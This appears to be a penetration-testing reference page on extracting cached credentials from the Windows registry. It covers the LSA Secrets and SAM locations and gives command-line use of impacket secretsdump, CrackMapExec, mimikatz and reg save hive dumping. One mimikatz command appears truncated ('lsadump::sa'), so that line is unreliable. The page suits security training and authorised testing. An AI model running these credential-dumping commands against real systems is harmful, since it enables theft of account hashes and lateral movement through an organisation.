Registry Credentials

The Windows Registry is a database used by the Windows Operating System to store configuration settings, preferences, and other information that attackers may be interested in, such as cached credentials.

Note that you need SYSTEM access, such as local administrator access, on a computer to view the registry's contents.

Attempting to obtain credentials from the registry is a very popular attack, so detections have improved as time has passed. However, if the organization doesn't have a good Endpoint Detection and Response (EDR), logging/detection capabilities, or their EDR isn't set up to stop the attack, dumping registry credentials is very viable.

LSA Secrets

The Local Security Authority (LSA) is a section in the Windows Registry used to save sensitive data only accessible to the SYSTEM local account. The LSA Secrets is a popular place for the following domain account credentials that can either be in plain text or password hash format:

Domain Computer Account Credentials
Domain Service Account Credentials
Auto-Logon Credentials
Data Protection API (DPAPI) Master Keys
Domain Cached Credentials (DCC)

The LSA Secrets are located in the SECURITY hive file encrypted with the BootKey/SysKey stored in the SYSTEM hive file. LSA Secrets Path: HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets

SAM

The Security Account Manager (SAM) is a component of the Windows Operating System that stores user accounts and related security information. The SAM database is used primarily for local accounts on a Windows computer.

The SAM database is a popular place for attackers to look for local accounts, such as the initial setup account organizations typically use to build the computer. If the setup account's credentials are used across all of the company's computers, obtaining the NTLM hash for this local setup account can give you access to all other computers (as long as the account is not disabled after setup).

SAM Database Path: C:\Windows\System32\config

SAM Password Hashes Path: HKEY_LOCAL_MACHINE\SAM

Dumping Registry Credentials

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

secretsdump.py <domain/>[username]<:password><@computer> <options>

OPTIONS
-outputfile                 Base Output Filename
-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File

GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networksGitHub

Linux

crackmapexec smb -u [username] -p [password] --lsa
crackmapexec smb -u [username] -p [password] --sam

CrackMapExec uses the impacket library for dumping LSA/SAM

GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub

Linux/Windows

## Run Mimikatz
mimikatz.exe

## Acquire A System Session
token::elevate

## Enable SeDebugPrivilege In Your Terminal
privilege::debug

## Get LSA, Cache, Or SAM (Respectively)
lsadump::secrets
lsadump::cache
lsadump::sa

Windows

## Save Required Hive Files
reg save HKLM\SYSTEM system.bin
reg save HKLM\SECURITY security.bin
reg save HKLM\SAM sam.bin

Linux

# Use impacket-secretsdump To Parse Hive Files
impacket-secretsdump -system system.bin -security security.bin -sam sam.bin LOCAL

PreviousLSASS Credentials NextNTDS.dit

Last updated 1 year ago